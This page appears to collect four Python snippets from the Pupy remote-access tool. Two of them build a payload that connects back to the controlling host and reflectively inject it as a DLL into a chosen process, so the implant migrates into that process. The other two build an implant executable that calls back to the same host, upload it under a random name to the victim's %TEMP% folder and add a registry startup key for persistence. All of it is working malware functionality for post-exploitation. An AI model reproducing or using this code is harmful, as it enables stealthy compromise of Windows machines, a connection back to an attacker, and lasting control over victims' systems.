Exemplo n.º 1
0
	def run(self, args):
		dllbuf=b""
		isProcess64bits=False
		#TODO automatically fill ip/port
		self.client.load_package("psutil")
		self.client.load_package("pupwinutils.processes")
		self.success("looking for configured connect back address ...")
		res=self.client.conn.modules['pupy'].get_connect_back_host()
		host, port=res.rsplit(':',1)
		self.success("address configured is %s:%s ..."%(host,port))
		self.success("looking for process %s architecture ..."%args.pid)
		if self.client.conn.modules['pupwinutils.processes'].is_process_64(args.pid):
			isProcess64bits=True
			self.success("process is 64 bits")
			dllbuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx64.dll"), host, port)
		else:
			self.success("process is 32 bits")
			dllbuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx86.dll"), host, port)
		self.success("injecting DLL in target process %s ..."%args.pid)
		self.client.conn.modules['pupy'].reflective_inject_dll(args.pid, dllbuff, isProcess64bits)
		self.success("DLL injected !")
		self.success("waiting for a connection from the DLL ...")
		while True:
			c=has_proc_migrated(self.client, args.pid)
			if c:
				self.success("got a connection from migrated DLL !")
				c.desc["id"]=self.client.desc["id"]
				break
			time.sleep(0.1)
		try:
			self.client.conn.exit()
		except Exception:
			pass
Exemplo n.º 2
0
	def run(self, args):
		if args.method=="registry":
			self.client.load_package("pupwinutils.persistence")

			#retrieving conn info
			res=self.client.conn.modules['pupy'].get_connect_back_host()
			host, port=res.rsplit(':',1)

			self.info("generating exe ...")
			#generating exe
			exebuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx86.exe"), host, port)

			remote_path=self.client.conn.modules['os.path'].expandvars("%TEMP%\\{}.exe".format(''.join([random.choice(string.ascii_lowercase) for x in range(0,random.randint(6,12))])))
			self.info("uploading to %s ..."%remote_path)
			#uploading
			rf=self.client.conn.builtin.open(remote_path, "wb")
			chunk_size=16000
			pos=0
			while True:
				buf=exebuff[pos:pos+chunk_size]
				if not buf:
					break
				rf.write(buf)
				pos+=chunk_size
			rf.close()
			self.success("upload successful")

			#adding persistency
			self.info("adding to registry ...")
			self.client.conn.modules['pupwinutils.persistence'].add_registry_startup(remote_path)
			self.info("registry key added")

			self.success("persistence added !")
		else:
			self.error("not implemented")
Exemplo n.º 3
0
 def run(self, args):
     dllbuf = b""
     isProcess64bits = False
     #TODO automatically fill ip/port
     self.client.load_package("psutil")
     self.client.load_package("pupwinutils.processes")
     self.success("looking for configured connect back address ...")
     res = self.client.conn.modules['pupy'].get_connect_back_host()
     host, port = res.rsplit(':', 1)
     self.success("address configured is %s:%s ..." % (host, port))
     self.success("looking for process %s architecture ..." % args.pid)
     if self.client.conn.modules['pupwinutils.processes'].is_process_64(
             args.pid):
         isProcess64bits = True
         self.success("process is 64 bits")
         dllbuff = genpayload.get_edit_binary(
             os.path.join("payloads", "pupyx64.dll"), host, port)
     else:
         self.success("process is 32 bits")
         dllbuff = genpayload.get_edit_binary(
             os.path.join("payloads", "pupyx86.dll"), host, port)
     self.success("injecting DLL in target process %s ..." % args.pid)
     self.client.conn.modules['pupy'].reflective_inject_dll(
         args.pid, dllbuff, isProcess64bits)
     self.success("DLL injected !")
     self.success("waiting for a connection from the DLL ...")
     while True:
         c = has_proc_migrated(self.client, args.pid)
         if c:
             self.success("got a connection from migrated DLL !")
             c.desc["id"] = self.client.desc["id"]
             break
         time.sleep(0.1)
     try:
         self.client.conn.exit()
     except Exception:
         pass
Exemplo n.º 4
0
    def run(self, args):
        if args.method == "registry":
            self.client.load_package("pupwinutils.persistence")

            #retrieving conn info
            res = self.client.conn.modules['pupy'].get_connect_back_host()
            host, port = res.rsplit(':', 1)

            self.info("generating exe ...")
            #generating exe
            exebuff = genpayload.get_edit_binary(
                os.path.join("payloads", "pupyx86.exe"), host, port)

            remote_path = self.client.conn.modules['os.path'].expandvars(
                "%TEMP%\\{}.exe".format(''.join([
                    random.choice(string.ascii_lowercase)
                    for x in range(0, random.randint(6, 12))
                ])))
            self.info("uploading to %s ..." % remote_path)
            #uploading
            rf = self.client.conn.builtin.open(remote_path, "wb")
            chunk_size = 16000
            pos = 0
            while True:
                buf = exebuff[pos:pos + chunk_size]
                if not buf:
                    break
                rf.write(buf)
                pos += chunk_size
            rf.close()
            self.success("upload successful")

            #adding persistency
            self.info("adding to registry ...")
            self.client.conn.modules[
                'pupwinutils.persistence'].add_registry_startup(remote_path)
            self.info("registry key added")

            self.success("persistence added !")
        else:
            self.error("not implemented")